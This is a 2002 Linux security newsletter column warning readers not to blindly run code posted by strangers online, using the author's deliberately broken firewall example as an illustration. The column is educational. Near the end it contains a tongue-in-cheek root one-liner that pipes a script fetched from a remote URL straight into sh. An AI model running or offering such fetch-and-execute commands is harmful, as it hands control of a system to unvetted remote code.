+------------------------------------------------------------------+ | Linux Security: Tips, Tricks, and Hackery | | Published by Onsight, Inc. | | | | 22-October-2002 | | http://www.hackinglinuxexposed.com/articles/20021022.html | +------------------------------------------------------------------+ This issue sponsored by: Hacking Linux Exposed Learn how to think like an attacker in order to secure your Linux network. In the ever-changing world of global data communications, inexpensive Internet connections, and fast-paced software development, security is constantly being compromised. Linux has always been considered the digital playground for crackers. Many hacks, exploits, and network security tools are written on Linux because it's readily available. Hacking Linux Exposed: Linux Security Secrets & Solutions shows you, step-by-step, how to defend against the latest Linux attacks by understanding the hacker's methods and sinister thought processes. For more information, visit http://www.hackinglinuxexposed.com/ -------------------------------------------------------------------- Vet the code or pay the price By Brian Hatch Summary: Too many people blindly execute commands from anonymous strangers without checking to see what lays hidden, and leave themselves open to malicous attacks. The Internet and it's myriad mailing lists can offer a wealth of help and assistance when you have problems. When asking what obscure OpenSSL command you need convert your X509 certificate from .cer to .pem format you'll likely get an answer[1] from someone you've never met. When trying to fix your Apache configuration to block access to all .htaccess files, someone will provide a snippet[2] of configuration that can help you out. Unfortunately, many people blindly copy and paste the suggestions without analysing what they're given. In the best scenario, the commands will not work and may leave you thinking you'd fixed your problem. In the worst case, you may have been given a trojan that will break the security of your own system and hand it to the cracker. This sort of trick is common on security lists where someone posts 'exploit code' to test your software but actually binds a rootshell or deletes your files. Although most folks claim never to trust code from unknown sources, I can still tell that this happens every day. For example two weeks ago in this column I showed you how you could create a simple but effective firewall in 10 minutes[3]. The column included a shell script you could run with minimal changes. The top of the script read as follows: # Definitions EXT_INTERFACE=eth1 EXT_IP=300.3.3.3 INT_INTERFACE=eth0 INT_IP=192.168.1.1 The IP address I used was 300.3.3.3. Anyone who's played with IP much will see that this doesn't make sense. The bytes in a valid IP address range between 0 and 255. [4] By choosing 300, I guarenteed that this script would blow up if anyone tried to run it unaltered. And run it they did. I received five emails from folks telling me that the code didn't work, and that they got errors because of the invalid IP address.[5] I get these type of complaints frequently. (The other kind of mail I get frequently contains little more than 'I need a program that will let me break into my friends computer. Send it to me now!'. I get this so much that I thought I'd help out by providing the following which must, sadly, be run as root: lynx --source http://www.hackinglinuxexposed.com/auto-hack-script.f?IP | sh You must replace 'IP' with the IP or hostname you'd like to attack.) Hopefully I don't need to explain any further why you shouldn't blindly run code from others. Next week I'll explain the methods I use when writing examples to help keep others from accidentally running my commands as-is. NOTES: [1] openssl x509 -in file.cer -inform d -out file.pem [2] You'd use: <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> [3] http://www.hackinglinuxexposed.com/articles/20021008.html [4] Of course the values 0 and 255 are not available in some cases. The first and last IP addresses in your range are reserved for the network address and the broadcast address, respectively. Some routers still do not let you use 0 or 255 as an octet, even when the netmask makes it clear it is not a network or broadcast address. [5] *Hobbit* went so far to refer to this article as '10 minute error fodder' because of the illegal IP used throughout. ------------- Brian Hatch is Chief Hacker at Onsight, Inc and author of Hacking Linux Exposed and Building Linux VPNs. He doesn't trust code that anyone sends him, and certainly nothing he provides to himself. Brian can be reached at brianat_private -------------------------------------------------------------------- This newsletter is distributed by Onsight, Inc. The list is managed with MailMan (http://www.list.org). You can subscribe, unsubscribe, or change your password by visiting http://lists.onsight.com/ or by sending email to linux_security-requestat_private Archives of this and previous newsletters are available at http://www.hackinglinuxexposed.com/articles/ -------------------------------------------------------------------- Copyright 2002, Brian Hatch. - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 01:43:37 PDT